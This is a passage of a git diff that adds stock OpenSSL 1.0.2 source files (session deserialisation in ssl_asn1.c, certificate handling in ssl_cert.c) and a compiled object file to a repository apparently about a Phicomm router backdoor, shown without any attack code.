+        OPENSSL_free(os.data);
+
+    ai.length = 0;
+    M_ASN1_D2I_get_EXP_opt(aip, d2i_ASN1_INTEGER, 1);
+    if (ai.data != NULL) {
+        ret->time = ASN1_INTEGER_get(aip);
+        OPENSSL_free(ai.data);
+        ai.data = NULL;
+        ai.length = 0;
+    } else
+        ret->time = (unsigned long)time(NULL);
+
+    ai.length = 0;
+    M_ASN1_D2I_get_EXP_opt(aip, d2i_ASN1_INTEGER, 2);
+    if (ai.data != NULL) {
+        ret->timeout = ASN1_INTEGER_get(aip);
+        OPENSSL_free(ai.data);
+        ai.data = NULL;
+        ai.length = 0;
+    } else
+        ret->timeout = 3;
+
+    if (ret->peer != NULL) {
+        X509_free(ret->peer);
+        ret->peer = NULL;
+    }
+    M_ASN1_D2I_get_EXP_opt(ret->peer, d2i_X509, 3);
+
+    os.length = 0;
+    os.data = NULL;
+    M_ASN1_D2I_get_EXP_opt(osp, d2i_ASN1_OCTET_STRING, 4);
+
+    if (os.data != NULL) {
+        if (os.length > SSL_MAX_SID_CTX_LENGTH) {
+            c.error = SSL_R_BAD_LENGTH;
+            c.line = __LINE__;
+            goto err;
+        } else {
+            ret->sid_ctx_length = os.length;
+            memcpy(ret->sid_ctx, os.data, os.length);
+        }
+        OPENSSL_free(os.data);
+        os.data = NULL;
+        os.length = 0;
+    } else
+        ret->sid_ctx_length = 0;
+
+    ai.length = 0;
+    M_ASN1_D2I_get_EXP_opt(aip, d2i_ASN1_INTEGER, 5);
+    if (ai.data != NULL) {
+        ret->verify_result = ASN1_INTEGER_get(aip);
+        OPENSSL_free(ai.data);
+        ai.data = NULL;
+        ai.length = 0;
+    } else
+        ret->verify_result = X509_V_OK;
+
+#ifndef OPENSSL_NO_TLSEXT
+    os.length = 0;
+    os.data = NULL;
+    M_ASN1_D2I_get_EXP_opt(osp, d2i_ASN1_OCTET_STRING, 6);
+    if (os.data) {
+        ret->tlsext_hostname = BUF_strndup((char *)os.data, os.length);
+        OPENSSL_free(os.data);
+        os.data = NULL;
+        os.length = 0;
+    } else
+        ret->tlsext_hostname = NULL;
+#endif                          /* OPENSSL_NO_TLSEXT */
+
+#ifndef OPENSSL_NO_PSK
+    os.length = 0;
+    os.data = NULL;
+    M_ASN1_D2I_get_EXP_opt(osp, d2i_ASN1_OCTET_STRING, 7);
+    if (os.data) {
+        ret->psk_identity_hint = BUF_strndup((char *)os.data, os.length);
+        OPENSSL_free(os.data);
+        os.data = NULL;
+        os.length = 0;
+    } else
+        ret->psk_identity_hint = NULL;
+
+    os.length = 0;
+    os.data = NULL;
+    M_ASN1_D2I_get_EXP_opt(osp, d2i_ASN1_OCTET_STRING, 8);
+    if (os.data) {
+        ret->psk_identity = BUF_strndup((char *)os.data, os.length);
+        OPENSSL_free(os.data);
+        os.data = NULL;
+        os.length = 0;
+    } else
+        ret->psk_identity = NULL;
+#endif                          /* OPENSSL_NO_PSK */
+
+#ifndef OPENSSL_NO_TLSEXT
+    ai.length = 0;
+    M_ASN1_D2I_get_EXP_opt(aip, d2i_ASN1_INTEGER, 9);
+    if (ai.data != NULL) {
+        ret->tlsext_tick_lifetime_hint = ASN1_INTEGER_get(aip);
+        OPENSSL_free(ai.data);
+        ai.data = NULL;
+        ai.length = 0;
+    } else if (ret->tlsext_ticklen && ret->session_id_length)
+        ret->tlsext_tick_lifetime_hint = -1;
+    else
+        ret->tlsext_tick_lifetime_hint = 0;
+    os.length = 0;
+    os.data = NULL;
+    M_ASN1_D2I_get_EXP_opt(osp, d2i_ASN1_OCTET_STRING, 10);
+    if (os.data) {
+        ret->tlsext_tick = os.data;
+        ret->tlsext_ticklen = os.length;
+        os.data = NULL;
+        os.length = 0;
+    } else
+        ret->tlsext_tick = NULL;
+#endif                          /* OPENSSL_NO_TLSEXT */
+#ifndef OPENSSL_NO_COMP
+    os.length = 0;
+    os.data = NULL;
+    M_ASN1_D2I_get_EXP_opt(osp, d2i_ASN1_OCTET_STRING, 11);
+    if (os.data) {
+        ret->compress_meth = os.data[0];
+        OPENSSL_free(os.data);
+        os.data = NULL;
+    }
+#endif
+
+#ifndef OPENSSL_NO_SRP
+    os.length = 0;
+    os.data = NULL;
+    M_ASN1_D2I_get_EXP_opt(osp, d2i_ASN1_OCTET_STRING, 12);
+    if (os.data) {
+        ret->srp_username = BUF_strndup((char *)os.data, os.length);
+        OPENSSL_free(os.data);
+        os.data = NULL;
+        os.length = 0;
+    } else
+        ret->srp_username = NULL;
+#endif                          /* OPENSSL_NO_SRP */
+
+    M_ASN1_D2I_Finish(a, SSL_SESSION_free, SSL_F_D2I_SSL_SESSION);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..94a3db08ddea736e5e6938023c4c723c15daf8d9
GIT binary patch
literal 11296
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
D_|tuG

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_cert.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_cert.c
new file mode 100644
index 0000000..93a1eb9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_cert.c
@@ -0,0 +1,1257 @@
+/*
+ * ! \file ssl/ssl_cert.c
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include <stdio.h>
+
+#include "e_os.h"
+#ifndef NO_SYS_TYPES_H
+# include <sys/types.h>
+#endif
+
+#include "o_dir.h"
+#include <openssl/objects.h>
+#include <openssl/bio.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+#include "ssl_locl.h"
+
+int SSL_get_ex_data_X509_STORE_CTX_idx(void)
+{
+    static volatile int ssl_x509_store_ctx_idx = -1;
+    int got_write_lock = 0;
+
+    if (((size_t)&ssl_x509_store_ctx_idx &
+         (sizeof(ssl_x509_store_ctx_idx) - 1))
+        == 0) {                 /* check alignment, practically always true */
+        int ret;
+
+        if ((ret = ssl_x509_store_ctx_idx) < 0) {
+            CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+            if ((ret = ssl_x509_store_ctx_idx) < 0) {
+                ret = ssl_x509_store_ctx_idx =
+                    X509_STORE_CTX_get_ex_new_index(0,
+                                                    "SSL for verify callback",
+                                                    NULL, NULL, NULL);
+            }
+            CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+        }
+
+        return ret;
+    } else {                    /* commonly eliminated */
+
+        CRYPTO_r_lock(CRYPTO_LOCK_SSL_CTX);
+
+        if (ssl_x509_store_ctx_idx < 0) {
+            CRYPTO_r_unlock(CRYPTO_LOCK_SSL_CTX);
+            CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+            got_write_lock = 1;
+
+            if (ssl_x509_store_ctx_idx < 0) {
+                ssl_x509_store_ctx_idx =
+                    X509_STORE_CTX_get_ex_new_index(0,
+                                                    "SSL for verify callback",
+                                                    NULL, NULL, NULL);
+            }
+        }
+
+        if (got_write_lock)
+            CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+        else
+            CRYPTO_r_unlock(CRYPTO_LOCK_SSL_CTX);
+
+        return ssl_x509_store_ctx_idx;
+    }
+}
+
+void ssl_cert_set_default_md(CERT *cert)
+{
+    /* Set digest values to defaults */
+#ifndef OPENSSL_NO_DSA
+    cert->pkeys[SSL_PKEY_DSA_SIGN].digest = EVP_sha1();
+#endif
+#ifndef OPENSSL_NO_RSA
+    cert->pkeys[SSL_PKEY_RSA_SIGN].digest = EVP_sha1();
+    cert->pkeys[SSL_PKEY_RSA_ENC].digest = EVP_sha1();
+#endif
+#ifndef OPENSSL_NO_ECDSA
+    cert->pkeys[SSL_PKEY_ECC].digest = EVP_sha1();
+#endif
+}
+
+CERT *ssl_cert_new(void)
+{
+    CERT *ret;
+
+    ret = (CERT *)OPENSSL_malloc(sizeof(CERT));
+    if (ret == NULL) {
+        SSLerr(SSL_F_SSL_CERT_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    memset(ret, 0, sizeof(CERT));
+
+    ret->key = &(ret->pkeys[SSL_PKEY_RSA_ENC]);
+    ret->references = 1;
+    ssl_cert_set_default_md(ret);
+    return (ret);
+}
+
+CERT *ssl_cert_dup(CERT *cert)
+{
+    CERT *ret;
+    int i;
+
+    ret = (CERT *)OPENSSL_malloc(sizeof(CERT));
+    if (ret == NULL) {
+        SSLerr(SSL_F_SSL_CERT_DUP, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    memset(ret, 0, sizeof(CERT));
+
+    ret->key = &ret->pkeys[cert->key - &cert->pkeys[0]];
+    /*
+     * or ret->key = ret->pkeys + (cert->key - cert->pkeys), if you find that
+     * more readable
+     */
+
+    ret->valid = cert->valid;
+    ret->mask_k = cert->mask_k;
+    ret->mask_a = cert->mask_a;
+    ret->export_mask_k = cert->export_mask_k;
+    ret->export_mask_a = cert->export_mask_a;
+
+#ifndef OPENSSL_NO_RSA
+    if (cert->rsa_tmp != NULL) {
+        RSA_up_ref(cert->rsa_tmp);
+        ret->rsa_tmp = cert->rsa_tmp;
+    }
+    ret->rsa_tmp_cb = cert->rsa_tmp_cb;
+#endif
+
+#ifndef OPENSSL_NO_DH
+    if (cert->dh_tmp != NULL) {
+        ret->dh_tmp = DHparams_dup(cert->dh_tmp);
+        if (ret->dh_tmp == NULL) {
+            SSLerr(SSL_F_SSL_CERT_DUP, ERR_R_DH_LIB);
+            goto err;
+        }
+        if (cert->dh_tmp->priv_key) {
+            BIGNUM *b = BN_dup(cert->dh_tmp->priv_key);
+            if (!b) {
+                SSLerr(SSL_F_SSL_CERT_DUP, ERR_R_BN_LIB);
+                goto err;
+            }
+            ret->dh_tmp->priv_key = b;
+        }
+        if (cert->dh_tmp->pub_key) {
+            BIGNUM *b = BN_dup(cert->dh_tmp->pub_key);
+            if (!b) {
+                SSLerr(SSL_F_SSL_CERT_DUP, ERR_R_BN_LIB);
+                goto err;
+            }
+            ret->dh_tmp->pub_key = b;
+        }
+    }
+    ret->dh_tmp_cb = cert->dh_tmp_cb;
+#endif
+
+#ifndef OPENSSL_NO_ECDH
+    if (cert->ecdh_tmp) {
+        ret->ecdh_tmp = EC_KEY_dup(cert->ecdh_tmp);
+        if (ret->ecdh_tmp == NULL) {
+            SSLerr(SSL_F_SSL_CERT_DUP, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+    ret->ecdh_tmp_cb = cert->ecdh_tmp_cb;
+    ret->ecdh_tmp_auto = cert->ecdh_tmp_auto;
+#endif
+
+    for (i = 0; i < SSL_PKEY_NUM; i++) {
+        CERT_PKEY *cpk = cert->pkeys + i;
+        CERT_PKEY *rpk = ret->pkeys + i;
+        if (cpk->x509 != NULL) {
+            rpk->x509 = cpk->x509;
+            CRYPTO_add(&rpk->x509->references, 1, CRYPTO_LOCK_X509);
+        }
+
+        if (cpk->privatekey != NULL) {
+            rpk->privatekey = cpk->privatekey;
+            CRYPTO_add(&cpk->privatekey->references, 1, CRYPTO_LOCK_EVP_PKEY);
+        }
+
+        if (cpk->chain) {
+            rpk->chain = X509_chain_up_ref(cpk->chain);
+            if (!rpk->chain) {
+                SSLerr(SSL_F_SSL_CERT_DUP, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        }
+        rpk->valid_flags = 0;
+#ifndef OPENSSL_NO_TLSEXT
+        if (cert->pkeys[i].serverinfo != NULL) {
+            /* Just copy everything. */
+            ret->pkeys[i].serverinfo =
+                OPENSSL_malloc(cert->pkeys[i].serverinfo_length);
+            if (ret->pkeys[i].serverinfo == NULL) {
+                SSLerr(SSL_F_SSL_CERT_DUP, ERR_R_MALLOC_FAILURE);
+                return NULL;
+            }
+            ret->pkeys[i].serverinfo_length =
+                cert->pkeys[i].serverinfo_length;
+            memcpy(ret->pkeys[i].serverinfo,
+                   cert->pkeys[i].serverinfo,
+                   cert->pkeys[i].serverinfo_length);
+        }
+#endif
+    }
+
+    ret->references = 1;
+    /*
+     * Set digests to defaults. NB: we don't copy existing values as they
+     * will be set during handshake.
+     */
+    ssl_cert_set_default_md(ret);
+    /* Peer sigalgs set to NULL as we get these from handshake too */
+    ret->peer_sigalgs = NULL;
+    ret->peer_sigalgslen = 0;
+    /* Configured sigalgs however we copy across */
+
+    if (cert->conf_sigalgs) {
+        ret->conf_sigalgs = OPENSSL_malloc(cert->conf_sigalgslen);
+        if (!ret->conf_sigalgs)
+            goto err;
+        memcpy(ret->conf_sigalgs, cert->conf_sigalgs, cert->conf_sigalgslen);
+        ret->conf_sigalgslen = cert->conf_sigalgslen;
+    } else
+        ret->conf_sigalgs = NULL;
+
+    if (cert->client_sigalgs) {
+        ret->client_sigalgs = OPENSSL_malloc(cert->client_sigalgslen);
+        if (!ret->client_sigalgs)
+            goto err;
+        memcpy(ret->client_sigalgs, cert->client_sigalgs,
+               cert->client_sigalgslen);
+        ret->client_sigalgslen = cert->client_sigalgslen;
+    } else
+        ret->client_sigalgs = NULL;
+    /* Shared sigalgs also NULL */
+    ret->shared_sigalgs = NULL;
+    /* Copy any custom client certificate types */
+    if (cert->ctypes) {
+        ret->ctypes = OPENSSL_malloc(cert->ctype_num);
+        if (!ret->ctypes)
+            goto err;
+        memcpy(ret->ctypes, cert->ctypes, cert->ctype_num);
+        ret->ctype_num = cert->ctype_num;
+    }
+
+    ret->cert_flags = cert->cert_flags;
+
+    ret->cert_cb = cert->cert_cb;
+    ret->cert_cb_arg = cert->cert_cb_arg;
+
+    if (cert->verify_store) {
+        CRYPTO_add(&cert->verify_store->references, 1,
+                   CRYPTO_LOCK_X509_STORE);
+        ret->verify_store = cert->verify_store;
+    }
+
+    if (cert->chain_store) {
+        CRYPTO_add(&cert->chain_store->references, 1, CRYPTO_LOCK_X509_STORE);
+        ret->chain_store = cert->chain_store;
+    }
+
+    ret->ciphers_raw = NULL;
+
+#ifndef OPENSSL_NO_TLSEXT
+    if (!custom_exts_copy(&ret->cli_ext, &cert->cli_ext))
+        goto err;
+    if (!custom_exts_copy(&ret->srv_ext, &cert->srv_ext))
+        goto err;
+#endif
+
+    return (ret);
+
+#if !defined(OPENSSL_NO_DH) || !defined(OPENSSL_NO_ECDH)
+ err:
